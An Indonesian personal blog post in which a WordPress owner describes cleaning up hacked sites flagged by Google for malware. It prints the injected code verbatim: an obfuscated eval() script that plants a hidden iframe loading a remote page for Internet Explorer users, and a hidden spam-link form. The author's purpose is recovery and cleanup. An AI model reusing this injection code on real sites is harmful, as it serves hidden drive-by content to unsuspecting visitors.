Satu kata yang bisa saya katakan hari ini, akhirnya….
Kenapa?
Karena hampir 5 hari ini saya mumet mikirin website-website saya yang terkena hack, disusupi malware, diberi label ‘merah’ oleh google, dan dikomplain client (karena website ikut terkena label merah juga). Hehehe..
Tetapi sekarang semua sudah beres. Nggak tau lagi kalau besok.. mudah-mudahan nggak ada hacker iseng lagi.
Ceritanya begini, sewaktu akan mengakses website, muncul peringatan bahwa websiteku mengandung malware.
“Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.”
Website Malware Klik Gambar Untuk Memperbesar
Huwaduh.. baru pertama kali nich, apa yang salah. Lalu saya coba menghubungi customer service hosting yang saya pakai, mereka tidak bisa berbuat banyak, hanya menyuruh saya menggunakan Google Webmaster Tools. Maka langkah-langkah untuk menyelesaikan masalah ini pun dimulai.
Kebanyakan hacker menyerang wordpress, jadi bagi yang mempunyai masalah sama mungkin pengalaman saya ini bisa membantu.
1. Sign Up ke Google Webmaster Tools untuk verifikasi websitemu. https://www.google.com/webmasters/tools/ Masukan URL websitemu, kemudian verifikasi melalui penambahan meta tag pada header atau upload file untuk mengidentifikasi bahwa website itu benar-benar tanggung jawabmu,
2. Gunakan fasilitas http://redleg-redleg.com/file-viewer/ untuk melihat isi halaman websitemu, apakah mengandung code-code yang berbahaya atau tidak. Untuk lebih jelasnya banyak-banyak baca blog http://redleg-redleg.blogspot.com
3. Script yang dideteksi sebagai malware oleh Google adalah
<sc ript>eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(‘i 9(){a=6.h(\’b\’);7(!a){5 0=6.j(\’k\’);6.g.l(0);0.n=\’b\’;0.4.d=\’8\’;0.4.c=\’8\’;0.4.e=\’f\’;0.m=\’w://z.o.B/C.D?t=E\’}}5 2=A.x.q();7(((2.3(“p”)!=-1&&2.3(“r”)==-1&&2.3(“s”)==-1))&&2.3(“v”)!=-1){5 t=u(“9()”,y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732′.split(‘|’),0,{}))</sc ript>Sedangkan script yang dideteksi oleh redleg adalah
<fo rm method=”post” action=”?” style=”overflow: auto; width: 5pt; height: 1pt; position: absolute; display: none “><A HREF=”http://businessactionf orafrica.org/?kids” TARGET=”_self”>kids clothes</A></fo rm>Cara menghilangkan script malware tersebut
1. Hapus <? wp_head()?>; pada file header.php, biasanya sebelum </head>. Hal itu akan menghilangkan script Kids Clothes yang mengarah ke website businessactionofafrica.
Ada kendala pada saat menghapus wp_head, karena pada beberapa kasus, tampilan blog atau website wordpressmu akan kacau. Jika kamu bisa memperbaikinya, maka itu tidak menjadi masalah. Tetapi jika kamu kesulitan dan awam dalam hal coding, maka cara lain adalah install ulang wordpressmu.
2. Sebelum install ulang wordpress, kamu harus menghapus bersih file di public_html, hapus juga database dan username yang digunakan. Kalau kamu menggunakan fantastico pada saat dulu menginstall wordpress, maka kamu harus remove wordpress dari fantastico juga. Setelah selesai, tetap saja kamu harus menghapus bersih semua file yang ada di public_html. Oh ya, tetapi terlebih dahulu backup semua file penting dalam wordpress seperti database (gunakan PHP MyAdmin untuk import database menjadi .sql), kemudian download file di folder uploads, plugins dan themes. Di Zip dulu foldernya agar bisa didownload. Pada postingan berikutnya nanti saya akan berbagi cara backup wordpress dengan cepat.
3. Kunjungi kembali Google webmaster tools, klik pada keterangan malware dan centang tanda review untuk meminta Google mereview ulang websitemu dan menghilangkan ‘tanda merah’.
Untuk pencegahan dari hacker usil, ada baiknya kamu mencari informasi dari website lain lebih banyak. Karena saya tidak ahli dalam hal itu, buktinya dalam dua bulan ini sering kena hack, hehe.. Selamat mencoba dan semoga berhasil
Read More
I'm Brillie. 25 years old, a blogger, a mother, former freelance wordpress developer, amazon affiliate and ebay seller. 
